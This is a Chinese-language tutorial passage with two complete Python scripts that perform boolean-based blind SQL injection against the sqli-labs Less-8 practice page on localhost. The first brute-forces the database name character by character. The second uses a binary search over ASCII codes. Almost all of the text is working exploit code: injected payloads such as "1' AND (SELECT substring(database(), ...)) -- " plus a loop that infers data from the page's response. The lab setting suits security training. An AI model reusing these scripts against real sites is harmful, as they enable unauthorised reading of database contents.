方法一(直接使用字符盲注)
import requests
#目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"
#要推断的数据库信息(例如:数据库名)
database_name = ""
#字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "
#推断数据库名的长度
def get_database_length():
length = 0
while True:
length += 1
payload = f"1' AND (SELECT length(database()) = {length}) -- "
response = requests.get(url, params={"id": payload})
if "You are in..........." in response.text:
return length
if length > 50: # 防止无限循环
break
return 0
#推断数据库名
def get_database_name(length):
db_name = ""
for i in range(1, length + 1):
for char in charset:
payload = f"1' AND (SELECT substring(database(), {i}, 1) = '{char}') -- "
response = requests.get(url, params={"id": payload})
if "You are in" in response.text:
db_name += char
break # 找到正确字符后跳出内层循环
return db_name
#主函数
if __name__ == "__main__":
length = get_database_length()
if length > 0:
print(f"Database length: {length}")
db_name = get_database_name(length)
print(f"Database name: {db_name}")
else:
print("Failed to determine database length.")
方法二(二分查找–利用Ascii将其转化为数字进行盲注)
import requests
import time
# 配置目标URL和检测信息
BASE_URL = "http://127.0.0.1/sqli/Less-8/index.php"
SUCCESS_MESSAGE = "You are in..........."
MAX_LENGTH = 50 # 最大长度限制
DELAY = 0.1 # 请求间隔(秒)
ASCII_MIN = 32 # 空格字符
ASCII_MAX = 126 # 波浪线字符
def check_injection(url, payload):
"""发送请求并检查是否注入成功"""
try:
response = requests.get(url, params={"id": payload})
time.sleep(DELAY) # 避免请求过快
return SUCCESS_MESSAGE in response.text
except requests.RequestException as e:
print(f"请求出错: {e}")
return False
def binary_search(url, payload_template, min_val, max_val):
"""使用二分查找确定ASCII值"""
low, high = min_val, max_val
while low <= high:
mid = (low + high) // 2
# 检查是否等于中间值
eq_payload = payload_template.format(operator="=", value=mid)
if check_injection(url, eq_payload):
return mid
# 检查是否小于中间值
lt_payload = payload_template.format(operator="<", value=mid)
if check_injection(url, lt_payload):
high = mid - 1
else:
low = mid + 1
return -1 # 未找到匹配值
def get_database_length(url):
"""使用二分查找获取数据库名长度"""
print("正在获取数据库名长度...")
low, high = 1, MAX_LENGTH
while low <= high:
mid = (low + high) // 2
payload = f"1' AND (SELECT length(database()) = {mid}) -- "
if check_injection(url, payload):
print(f"数据库名长度: {mid}")
return mid
payload_lt = f"1' AND (SELECT length(database()) < {mid}) -- "
if check_injection(url, payload_lt):
high = mid - 1
else:
low = mid + 1
print("无法确定数据库名长度")
return 0
def get_database_name(url, length):
"""使用二分查找获取数据库名"""
print("正在获取数据库名...")
db_name = ""
payload_template = "1' AND (SELECT ASCII(SUBSTRING(database(), {pos}, 1)) {{operator}} {{value}}) -- "
for pos in range(1, length + 1):
formatted_template = payload_template.format(pos=pos)
ascii_code = binary_search(url, formatted_template, ASCII_MIN, ASCII_MAX)
if ascii_code != -1:
db_name += chr(ascii_code)
print(f"已获取字符 {pos}/{length}: {db_name}")
return db_name
def main():
"""主函数"""
print(f"开始对 {BASE_URL} 进行SQL注入测试")
# 获取数据库名
db_length = get_database_length(BASE_URL)
if db_length <= 0:
print("无法获取数据库信息,退出")
return
db_name = get_database_name(BASE_URL, db_length)
print(f"数据库名: {db_name}")
if __name__ == "__main__":
main()